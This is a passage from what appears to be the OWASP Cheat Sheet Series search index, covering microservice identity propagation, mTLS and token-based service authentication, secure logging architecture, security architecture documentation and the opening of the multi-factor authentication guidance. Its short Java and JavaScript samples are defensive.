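import java.net.URI;\nimport java.net.http.HttpClient;\nimport java.net.http.HttpRequest;\nimport java.net.http.HttpResponse;\n\npublic class IdentityPropagationClient {\n    private final HttpClient http = HttpClient.newHttpClient();\n\n    // Forwards the already-authenticated caller identity as plain headers (trusted network only).\n    public String callDownstream(String userId, String roles) throws Exception {\n        HttpRequest request = HttpRequest.newBuilder()\n            .uri(URI.create(\"https://orders.internal.example/orders\")) // assumed internal endpoint\n            .header(\"X-User-Id\", userId)       // assumed header names\n            .header(\"X-User-Roles\", roles)\n            .GET()\n            .build();\n        return http.send(request, HttpResponse.BodyHandlers.ofString()).body();\n    }\n}\n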

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#using-a-data-structures-signed-by-a-trusted-issuer","title":"Using a data structures signed by a trusted issuer","text":"

In this pattern, after the external request is authenticated by the authentication service at the edge layer, a data structure representing the external entity identity (e.g., containing the user ID, user roles/groups or permissions) is generated, signed or encrypted by the trusted issuer and propagated to internal microservices.

Netflix presented a real case of using this pattern: a structure called \u201cPassport\u201d that contains the user ID and its attributes, and is HMAC protected, is created at the edge level for each incoming request, propagated to internal microservices and never exposed outside:

  1. Edge authentication service (EAS) obtains secret key from the Key Management System.
  2. EAS receives an access token (which may be, e.g., in a cookie, a JWT or an OAuth2 token) from the incoming request.
  3. EAS decrypts the access token, resolves the external entity identity and sends it to the internal services in the signed \u201cPassport\u201d structure.
  4. Internal services can extract user identity in order to enforce authorization (e.g. to implement identity-based authorization) using wrappers.
  5. If necessary, internal service can propagate \u201cPassport\u201d structure to downstream services in the call chain.

It should be mentioned that this pattern is external-access-token agnostic and allows decoupling the external entity from its internal representation.
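
A minimal sketch of issuing such a signed internal identity structure at the edge (the payload layout and key handling are assumptions; the real Netflix Passport format is more elaborate): the identity is serialized and protected with an HMAC computed with a key obtained from the key management system:

import java.nio.charset.StandardCharsets;\nimport java.util.Base64;\nimport javax.crypto.Mac;\nimport javax.crypto.spec.SecretKeySpec;\n\n// Sketch: the edge builds an internal identity structure and protects it with an HMAC\n// using a key obtained from the key management system.\npublic class PassportIssuer {\n    private final byte[] secretKey; // provisioned from the KMS at startup\n\n    public PassportIssuer(byte[] secretKey) {\n        this.secretKey = secretKey;\n    }\n\n    public String issue(String userId, String roles) throws Exception {\n        String payload = userId + '|' + roles;                    // assumed internal layout\n        Mac mac = Mac.getInstance(\"HmacSHA256\");\n        mac.init(new SecretKeySpec(secretKey, \"HmacSHA256\"));\n        byte[] tag = mac.doFinal(payload.getBytes(StandardCharsets.UTF_8));\n        // payload.tag is propagated to internal services, never to external clients\n        return Base64.getUrlEncoder().encodeToString(payload.getBytes(StandardCharsets.UTF_8))\n            + '.' + Base64.getUrlEncoder().encodeToString(tag);\n    }\n}\n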

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#recommendation-on-how-to-implement-identity-propagation","title":"Recommendation on how to implement identity propagation","text":"
  1. In order to implement an external-access-token agnostic and extendable system, decouple the access tokens issued for an external entity from its internal representation. Use a single data structure to represent and propagate the external entity identity among microservices. The edge-level service has to verify the incoming external access token, issue an internal entity representation structure and propagate it to downstream services.
  2. Using an internal entity representation structure signed (symmetrically or asymmetrically) by a trusted issuer is the recommended pattern adopted by the community.
  3. The internal entity representation structure should be extensible so that more claims can be added; carrying the needed claims in the structure can keep latency low, since downstream services do not need additional lookups.
  4. The internal entity representation structure must not be exposed outside (e.g., to a browser or an external device).
"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#service-to-service-authentication","title":"Service-to-service authentication","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#existing-patterns","title":"Existing patterns","text":""},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#mutual-transport-layer-security","title":"Mutual transport layer security","text":"

In the mTLS approach, each microservice can legitimately identify the party it talks to, in addition to achieving confidentiality and integrity of the transmitted data. Each microservice in the deployment has to carry a public/private key pair and uses that key pair to authenticate to the recipient microservices via mTLS. mTLS is usually implemented with a self-hosted Public Key Infrastructure. The main challenges of using mTLS are key provisioning and trust bootstrap, certificate revocation and key rotation.
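
A minimal caller-side sketch (key store locations, formats and passwords are placeholders): the microservice builds an SSLContext that presents its own certificate and validates the peer against the internal CA, which is what gives mutual authentication:

import java.io.FileInputStream;\nimport java.security.KeyStore;\nimport javax.net.ssl.KeyManagerFactory;\nimport javax.net.ssl.SSLContext;\nimport javax.net.ssl.TrustManagerFactory;\n\npublic class MtlsContextFactory {\n\n    // Builds an SSLContext that both presents a client certificate and verifies the server\n    // against the internal CA, giving mutual authentication for service-to-service calls.\n    public static SSLContext build(String keyStorePath, char[] keyPassword,\n                                   String trustStorePath, char[] trustPassword) throws Exception {\n        KeyStore keyStore = KeyStore.getInstance(\"PKCS12\");\n        keyStore.load(new FileInputStream(keyStorePath), keyPassword);\n        KeyManagerFactory kmf = KeyManagerFactory.getInstance(KeyManagerFactory.getDefaultAlgorithm());\n        kmf.init(keyStore, keyPassword);\n\n        KeyStore trustStore = KeyStore.getInstance(\"PKCS12\");\n        trustStore.load(new FileInputStream(trustStorePath), trustPassword);\n        TrustManagerFactory tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());\n        tmf.init(trustStore);\n\n        SSLContext context = SSLContext.getInstance(\"TLSv1.3\");\n        context.init(kmf.getKeyManagers(), tmf.getTrustManagers(), null);\n        return context;\n    }\n}\n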

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#token-based","title":"Token based","text":"

The token-based approach works at the application layer. A token is a container and may contain the caller ID (microservice ID) and its permissions (scopes). The caller microservice obtains a signed token by invoking a special security token service using its own service ID and password, and then attaches it to every outgoing request, e.g., via HTTP headers (a caller-side sketch is shown after the list below). The called microservice can extract the token and validate it online or offline.

  1. Online scenario:
  2. Offline scenario:
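
A minimal caller-side sketch (the STS endpoint, credential names and response contract are assumptions): the microservice obtains a signed token from the security token service using its own service credentials and attaches it to outgoing requests, leaving online or offline validation to the called service:

import java.net.URI;\nimport java.net.http.HttpClient;\nimport java.net.http.HttpRequest;\nimport java.net.http.HttpResponse;\n\npublic class ServiceTokenClient {\n    private final HttpClient http = HttpClient.newHttpClient();\n\n    // Obtains a signed token for this microservice from the security token service (STS).\n    public String fetchToken(String serviceId, String serviceSecret) throws Exception {\n        String body = \"grant_type=client_credentials&client_id=\" + serviceId\n            + \"&client_secret=\" + serviceSecret;\n        HttpRequest request = HttpRequest.newBuilder()\n            .uri(URI.create(\"https://sts.internal.example/token\")) // assumed STS endpoint\n            .header(\"Content-Type\", \"application/x-www-form-urlencoded\")\n            .POST(HttpRequest.BodyPublishers.ofString(body))\n            .build();\n        // Assumed contract: the STS returns the raw signed token in the response body.\n        return http.send(request, HttpResponse.BodyHandlers.ofString()).body();\n    }\n\n    // Attaches the token to an outgoing call so the called service can validate it on- or offline.\n    public String callWithToken(String url, String token) throws Exception {\n        HttpRequest request = HttpRequest.newBuilder()\n            .uri(URI.create(url))\n            .header(\"Authorization\", \"Bearer \" + token)\n            .GET()\n            .build();\n        return http.send(request, HttpResponse.BodyHandlers.ofString()).body();\n    }\n}\n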
"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#logging","title":"Logging","text":"

Logging services in microservice-based systems aim to meet the principles of accountability and traceability and help detect security anomalies in operations via log analysis. Therefore, it is vital for application security architects to understand and adequately use existing architecture patterns to implement audit logging in microservices-based systems for security operations. A high-level architecture design is shown in the picture below and is based on the following principles:

High-level recommendations to logging subsystem architecture with its rationales are listed below.

  1. A microservice shall not send log messages directly to the central logging subsystem using network communication; the microservice shall write its log messages to a local log file:
  2. There shall be a dedicated component (logging agent) decoupled from the microservice. The logging agent shall collect log data on the microservice (read the local log file) and send it to the central logging subsystem. Due to possible network latency issues, the logging agent shall be deployed on the same host (virtual or physical machine) as the microservice:
  3. To mitigate a possible DoS attack on the central logging subsystem, the logging agent shall not send log messages using a synchronous request/response pattern. There shall be a message broker to implement the asynchronous connection between the logging agent and the central logging service:
  4. Logging agent and message broker shall use mutual authentication (e.g., based on TLS) to encrypt all transmitted data (log messages) and authenticate themselves:
  5. Message broker shall enforce access control policy to mitigate unauthorized access and implement the principle of least privileges:
  6. The logging agent shall filter/sanitize output log messages so that sensitive data (e.g., PII, passwords, API keys) is never sent to the central logging subsystem (data minimization principle). For a comprehensive overview of items that should be excluded from logging, please see the OWASP Logging Cheat Sheet.
  7. Microservices shall generate a correlation ID that uniquely identifies every call chain and helps group log messages to investigate them. The logging agent shall include a correlation ID in every log message.
  8. Logging agent shall periodically provide health and status data to indicate its availability or non-availability.
  9. Logging agent shall publish log messages in structured logs format (e.g., JSON, CSV).
  10. The logging agent shall append context data to log messages, e.g., platform context (hostname, container name) and runtime context (class name, filename); an illustrative message is shown after this list.
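
For illustration, a structured log message as the logging agent could publish it to the message broker, with an assumed correlation ID and appended platform/runtime context (field names are illustrative, not prescribed; the event name is taken from the Application Logging Vocabulary Cheat Sheet):

{\n    \"datetime\": \"2019-01-01 00:00:00,000\",\n    \"appid\": \"foobar.netportal_auth\",\n    \"correlationid\": \"8f1c9d2e-0000-0000-0000-000000000000\",\n    \"event\": \"authn_login_success:joebob1\",\n    \"level\": \"INFO\",\n    \"hostname\": \"node-1\",\n    \"containername\": \"auth-7f6d\",\n    \"classname\": \"LoginController\",\n    \"description\": \"User joebob1 login successfully\",\n    ...\n}\n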

For a comprehensive overview of events that should be logged and possible data formats, please see the OWASP Logging Cheat Sheet and the Application Logging Vocabulary Cheat Sheet.

"},{"location":"cheatsheets/Microservices_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html","title":"Microservices based Security Arch Doc Cheat Sheet","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The microservice architecture is increasingly used for designing and implementing application systems in both cloud-based and on-premise infrastructures. There are many security challenges that need to be addressed in the application design and implementation phases. In order to address some of these security challenges, it is necessary to collect security-specific information on the application architecture. The goal of this article is to provide a concrete proposal of an approach to collecting microservice-based architecture information in order to secure the application.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#context","title":"Context","text":"

When securing applications based on a microservices architecture, security architects/engineers usually face the following questions (mostly referenced in the OWASP Application Security Verification Standard Project under section V1 \"Architecture, Design and Threat Modeling Requirements\"):

  1. Threat modeling and enforcement of the principle of least privilege:
  2. Data leakage analysis:
  3. Attack surface analysis:

In most cases, existing application architecture documentation is not suitable to answer those questions. The next sections propose what security-specific architecture information can be collected to answer the questions above.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#objective","title":"Objective","text":"

The objectives of this cheat sheet are to explain what security-specific architecture information can be collected to answer the questions above and to provide a concrete proposal of an approach to collecting microservice-based architecture information in order to secure the application.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#proposition","title":"Proposition","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#collect-information-on-the-building-blocks","title":"Collect information on the building blocks","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-application-functionality-services","title":"Identify and describe application-functionality services","text":"

Application-functionality services implement one or several business processes or functions (e.g., storing customer details, storing and displaying the product catalog). Collect information on the parameters listed below for each application-functionality service.

Parameter name Description Service name (ID) Unique service name or ID Short description Short description of business process or functionality implemented by the microservice Link to source code repository Specify a link to service source code repository Development Team Specify development team which develops the microservice API definition If microservice exposes external interface specify a link to the interface description (e.g., OpenAPI specification). It is advisable to define used security scheme, e.g. define scopes or API keys needed to invoke dedicated endpoint (e.g., see). The microservice architecture description Specify a link to the microservice architecture diagram, description (if available) Link to runbook Specify a link to the microservice runbook"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-infrastructure-services","title":"Identify and describe infrastructure services","text":"

Infrastructure services including remote services may implement authentication, authorization, service registration and discovery, security monitoring, logging etc. Collect information on the parameters listed below related to each infrastructure service.

Parameter name Description Service name (ID) Unique service name or ID Short description Short description of functionality implemented by the service (e.g., authentication, authorization, service registration and discovery, logging, security monitoring, API gateway). Link to source code repository Specify a link to service source code repository (if applicable) Link to the service documentation Specify a link to the service documentation that includes service API definition, operational guidance/runbook, etc."},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-data-storages","title":"Identify and describe data storages","text":"

Collect information on the parameters listed below related to each data storage.

Parameter name Description Storage name (ID) Unique storage name or ID Software type Specify software that implements the data storage (e.g., PostgreSQL, Redis, Apache Cassandra)."},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-message-queues","title":"Identify and describe message queues","text":"

Messaging systems (e.g., RabbitMQ or Apache Kafka) are used to implement asynchronous microservices communication mechanism. Collect information on the parameters listed below related to each message queue.

Parameter name Description Message queue (ID) Unique message queue name or ID Software type Specify software that implements the message queue (e.g., RabbitMQ, Apache Kafka)."},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-and-describe-data-assets","title":"Identify and describe data assets","text":"

Identify and describe the data assets that are processed by the system's microservices/services. It is advisable to first identify the assets that are valuable from a security perspective (e.g., \"User information\", \"Payment\"). Collect information on the parameters listed below for each asset.

Parameter name Description Asset name (ID) Unique asset name or ID Protection level Specify asset protection level (e.g., PII, confidential) Additional info Add clarifying information"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#collect-information-on-relations-between-building-blocks","title":"Collect information on relations between building blocks","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-service-to-storage-relations","title":"Identify \"service-to-storage\" relations","text":"

Collect information on the parameters listed below related to each \"service-to-storage\" relation.

Parameter name Description Service name (ID) Specify service name (ID) defined above Storage name (ID) Specify storage name (ID) defined above Access type Specify access type, e.g. \"Read\" or \"Read/Write\""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-service-to-service-synchronous-communications","title":"Identify \"service-to-service\" synchronous communications","text":"

Collect information on the parameters listed below related to each \"service-to-service\" synchronous communication.

Parameter name Description Caller service name (ID) Specify caller service name (ID) defined above Called service name (ID) Specify called service name (ID) defined above Protocol/framework used Specify protocol/framework used for communication, e.g. HTTP (REST, SOAP), Apache Thrift, gRPC Short description Briefly describe the purpose of communication (requests for query of information or request/commands for a state-changing business function) and data passed between services (if possible, in terms of assets defined above)"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-service-to-service-asynchronous-communications","title":"Identify \"service-to-service\" asynchronous communications","text":"

Collect information on the parameters listed below related to each \"service-to-service\" asynchronous communication.

Parameter name Description Publisher service name (ID) Specify publisher service name (ID) defined above Subscriber service name (ID) Specify subscriber service name (ID) defined above Message queue (ID) Specify message queue (ID) defined above Short description Briefly describe the purpose of communication (receiving of information or commands for a state-changing business function) and data passed between services (if possible, in terms of assets defined above)"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#identify-asset-to-storage-relations","title":"Identify \"asset-to-storage\" relations","text":"

Collect information on the parameters listed below related to each \"asset-to-storage\" relation.

Parameter name Description Asset name (ID) Asset name (ID) defined above Storage name (ID) Specify storage name (ID) defined above Storage type Specify storage type for the asset, e.g. \"golden source\" or \"cache\""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#create-a-graphical-presentation-of-application-architecture","title":"Create a graphical presentation of application architecture","text":"

It is advisable to create a graphical representation of the application architecture (the building blocks and relations defined above) in the form of a service call graph or a data flow diagram. To do that, one can use dedicated software tools (e.g. Enterprise Architect) or the DOT language. See an example of using the DOT language here.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#use-collected-information-in-secure-software-development-practices","title":"Use collected information in secure software development practices","text":"

The collected information may be useful for application security practices, e.g. when defining security requirements, threat modeling or security testing. The sections below contain examples of activities related to securing the application architecture (as well as their mapping to OWASP projects) and tips for implementing them using the information collected above.

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#attack-surface-analysis","title":"Attack surface analysis","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips","title":"Implementation tips","text":"

To enumerate the microservice endpoints that need to be tested during security testing and analyzed during threat modeling, analyze the data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#data-leakage-analysis","title":"Data leakage analysis","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_1","title":"Implementation tips","text":"

To analyze possible data leakage, analyze the data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_1","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#applications-trust-boundaries-components-and-significant-data-flows-justification","title":"Application's trust boundaries, components, and significant data flows justification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_2","title":"Implementation tips","text":"

To verify documentation and justification of all the application's trust boundaries, components, and significant data flows, analyze the data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_2","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#analysis-of-the-applications-high-level-architecture","title":"Analysis of the application's high-level architecture","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_3","title":"Implementation tips","text":"

To verify the definition and security analysis of the application's high-level architecture and all connected remote services, analyze the data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_3","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-of-centralized-security-controls-verification","title":"Implementation of centralized security controls verification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_4","title":"Implementation tips","text":"

To verify the implementation of centralized, simple (economy of design), vetted, secure, and reusable security controls to avoid duplicate, missing, ineffective, or insecure controls, analyze the data collected under the section \"Identify and describe infrastructure services\".

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_4","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#enforcement-of-the-principle-of-least-privilege","title":"Enforcement of the principle of least privilege","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_5","title":"Implementation tips","text":"

To define the minimum permissions needed by each microservice, analyze the data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_5","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#sensitive-data-identification-and-classification","title":"Sensitive data identification and classification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_6","title":"Implementation tips","text":"

To verify that all sensitive data is identified and classified into protection levels, analyze the data collected under the following sections:

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_6","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#application-components-businesssecurity-functions-verification","title":"Application components business/security functions verification","text":""},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#implementation-tips_7","title":"Implementation tips","text":"

To verify the definition and documentation of all application components in terms of the business or security functions they provide, analyze the data collected under the following sections (parameter \"Short description\"):

"},{"location":"cheatsheets/Microservices_based_Security_Arch_Doc_Cheat_Sheet.html#mapping-to-owasp-projects_7","title":"Mapping to OWASP projects","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html","title":"Multi-Factor Authentication Cheat Sheet","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Multi-Factor Authentication (MFA), or Two-Factor Authentication (2FA), is when a user is required to present more than one type of evidence in order to authenticate to a system. There are four different types of evidence (or factors) that can be used, listed in the table below:

| Factor | Examples |
|--------|----------|
| Something You Know | Passwords, PINs and security questions. |
| Something You Have | Hardware or software tokens, certificates, email, SMS and phone calls. |
| Something You Are | Fingerprints, facial recognition, iris scans and handprint scans. |
| Location | Source IP ranges and geolocation. |

It should be emphasised that requiring multiple examples of a single factor (such as needing both a password and a PIN) does not constitute MFA, although it may provide some security benefits over a simple password.

Additionally, while the following sections discuss the disadvantages and weaknesses of various types of MFA, in many cases these are only relevant against targeted attacks. Any MFA is better than no MFA.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#advantages","title":"Advantages","text":"

The most common way that user accounts get compromised on applications is through weak, re-used or stolen passwords. Despite any technical security controls implemented on the application, users are liable to choose weak passwords, or to use the same password on different applications. As developers or system administrators, it should be assumed that users' passwords will be compromised at some point, and the system should be designed in order to defend against this.

Multi-factor authentication (MFA) is by far the best defense against the majority of password-related attacks, including brute-force, credential stuffing and password spraying, with analysis by Microsoft suggesting that it would have stopped 99.9% of account compromises.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#disadvantages","title":"Disadvantages","text":"

The biggest disadvantage of MFA is the increase in management complexity for both administrators and end users. Many less technical users may find it difficult to configure and use MFA. Additionally, there are a number of other common issues encountered:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#quick-recommendations","title":"Quick Recommendations","text":"

Exactly when and how MFA is implemented in an application will vary on a number of different factors, including the threat model of the application, the technical level of the users, and the level of administrative control over the users. These need to be considered on a per-application basis.

However, the following recommendations are generally appropriate for most applications, and provide an initial starting point to consider.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#implementing-mfa","title":"Implementing MFA","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#when-to-require-mfa","title":"When to Require MFA","text":"

The most important place to require MFA on an application is when the user logs in. However, depending on the functionality available, it may also be appropriate to require MFA for performing sensitive actions, such as:

If the application provides multiple ways for a user to authenticate, these should all require MFA or have other protections implemented. A commonly missed area is an application that provides a separate API that can be used to log in, or that has an associated mobile application.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#improving-usability","title":"Improving Usability","text":"

Having to frequently log in with MFA creates an additional burden for users, and may cause them to disable MFA on the application. A number of mechanisms can be used to reduce the level of annoyance that MFA causes. However, these measures do decrease the security provided by MFA, so they need to be risk assessed to find a reasonable balance of security and usability for the application.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#failed-login-attempts","title":"Failed Login Attempts","text":"

When a user enters their password, but fails to authenticate using a second factor, this could mean one of two things:

There are a number of steps that should be taken when this occurs:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#resetting-mfa","title":"Resetting MFA","text":"

One of the biggest challenges with implementing MFA is handling users who forget or lose their second factors. There are many ways this could happen, such as:

In order to prevent users from being locked out of the application, there needs to be a mechanism for them to regain access to their account if they can't use their existing MFA; however, it is also crucial that this doesn't provide an attacker with a way to bypass MFA and hijack the account.

There is no definitive \"best way\" to do this, and what is appropriate will vary hugely based on the security of the application, and also the level of control over the users. Solutions that work for a corporate application where all the staff know each other are unlikely to be feasible for a publicly available application with thousands of users all over the world. Every recovery method has its own advantages and disadvantages, and these need to be evaluated in the context of the application.

Some suggestions of possible methods include:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#something-you-know","title":"Something You Know","text":"

The most common type of authentication is based on something the user knows - typically a password. The biggest advantage of this factor is that it has very low requirements for both the developers and the end user, as it does not require any special hardware or integration with other services.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#passwords-and-pins","title":"Passwords and PINs","text":"

Passwords and PINs are the most common form of authentication due to the simplicity of implementing them. The Authentication Cheat Sheet has guidance on how to implement a strong password policy, and the Password Storage Cheat Sheet has guidance on how to securely store passwords.

Most multi-factor authentication systems make use of a password, as well as at least one other factor.

It should be noted that PINs, \"secret words\" and other similar types of information are all effectively the same as passwords. Using two different types of passwords does not constitute MFA.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#security-questions","title":"Security Questions","text":"

Security questions require the user to choose (or create) a number of questions that only they will know the answer to. These are effectively the same as passwords, although they are generally considered weaker. The Choosing and Using Security Questions Cheat Sheet contains further guidance on how to implement these securely.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_1","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_1","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#something-you-have","title":"Something You Have","text":"

The second factor is something that the user possesses. This could be a physical item (such as a hardware token), a digital item (such as a certificate or private key), or based on the ownership of a mobile phone, phone number, or email address (such as SMS or a software token installed on the phone, or an email with a single-use verification code).

If properly implemented, this can be significantly more difficult for a remote attacker to compromise; however, it also creates an additional administrative burden on the user, as they must keep the authentication factor with them whenever they wish to use it.

The requirement to have a second factor can also limit certain types of users' ability to access a service. For example, if a user does not have access to a mobile phone, many types of MFA will not be available for them.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#hardware-otp-tokens","title":"Hardware OTP Tokens","text":"

Physical hardware OTP tokens can be used which generate constantly changing numeric codes that must be submitted when authenticating to the application. The best known of these is the RSA SecurID, which generates a six-digit number that changes every 60 seconds.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_2","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_2","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#software-totp-tokens","title":"Software TOTP Tokens","text":"

A cheaper and easier alternative to hardware tokens is using software to generate Time-based One Time Password (TOTP) codes. This would typically involve the user installing a TOTP application on their mobile phone, and then scanning a QR code provided by the web application which provides the initial seed. The authenticator app then generates a new six-digit code at a fixed interval (typically every 30 or 60 seconds), in much the same way as a hardware token.

Most websites use standardized TOTP tokens, allowing the user to install any authenticator app that supports TOTP. However, a small number of applications use their own variants of this (such as Symantec), which requires the users to install a specific app in order to use the service. This should be avoided in favour of a standards-based approach.
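
On the server side, verifying a submitted TOTP code is typically a single check against the stored seed. The following is a minimal sketch only, assuming the otplib npm package (one of several TOTP libraries) and a secret that has already been shared with the user's authenticator app:

const { authenticator } = require('otplib')\n\n// Generate a per-user secret once, during MFA enrolment; the same secret\n// is encoded in the QR code that the user scans with their authenticator app\nconst secret = authenticator.generateSecret()\n\n// During login, check the six-digit code submitted by the user against the stored secret\nfunction verifyTotp(submittedCode) {\n    return authenticator.check(submittedCode, secret)\n}\n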

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_3","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_3","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#hardware-u2f-tokens","title":"Hardware U2F Tokens","text":"

Hardware U2F tokens communicate with the user's workstation over USB or NFC, and implement challenge-response based authentication rather than requiring the user to manually enter a code. This would typically be done by the user pressing a button on the token, or tapping it against their NFC reader.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_4","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_4","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#certificates","title":"Certificates","text":"

Digital certificates are files that are stored on the user's device which are automatically provided alongside the user's password when authenticating. The most common type is X.509 certificates (discussed in the Transport Layer Protection Cheat Sheet), more commonly known as client certificates.

Certificates are supported by all major web browsers, and once installed require no further interaction from the user. The certificates should be linked to an individual's user account in order to prevent users from trying to authenticate against other accounts.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_5","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_5","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#smartcards","title":"Smartcards","text":"

Smartcards are credit-card size cards with a chip containing a digital certificate for the user, which is unlocked with a PIN. They are commonly used for operating system authentication, but are rarely used in web applications.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_6","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_6","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#sms-messages-and-phone-calls","title":"SMS Messages and Phone Calls","text":"

SMS messages or phone calls can be used to provide users with a single-use code that they must submit as a second factor.

